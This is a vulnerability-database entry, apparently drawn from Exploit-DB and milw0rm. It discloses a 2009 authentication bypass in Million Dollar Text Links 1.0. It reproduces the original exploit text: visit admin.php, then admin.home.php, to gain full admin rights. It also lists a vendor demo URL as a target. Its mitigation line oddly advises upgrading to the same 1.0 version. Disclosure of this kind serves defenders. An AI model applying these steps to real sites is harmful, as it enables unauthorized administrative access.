Million Dollar Text Links 1.0 Authenication Bypass

vendor:

Million Dollar Text Links

by:

ThE g0bL!N

7,5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: Million Dollar Text Links

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: Yes

Related CWE: N/A

CPE: a:kalptaru_infotech:million_dollar_text_links

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Million Dollar Text Links 1.0 Authenication Bypass

Million Dollar Text Links 1.0 is vulnerable to an authentication bypass vulnerability. An attacker can access the admin.home.php page without authentication by accessing the admin.php page first.

Mitigation:

Upgrade to the latest version of Million Dollar Text Links 1.0

Source

Exploit-DB raw data:

---------------------------------------------------------------
---------------------------------------------------------------
Million Dollar Text Links 1.0 Authenication Bypass
---------------------------------------------------------------

Founder : ThE g0bL!N
Home:WwW.h4ckF0u.CoM
Vendor:http://www.kalptarudemos.com
---------------------------------------------------------------
---------------------------------------------------------------
Million Dollar Text Links 1.0 Authenication Bypass:
------------------------------------------------
http://victim/[path]/admin.php
Then Go to
http://victim/[path]/admin.home.php
Booooooom Control Bypassed :) And You Have ALL Permission :=)

--------------------------------------
Dem0
----
http://www.kalptarudemos.com/demo/million/admin.php
--------------------------------------

Greeting To ALL My Friends (Dz)
----------------------------------------------------------------

# milw0rm.com [2009-05-04]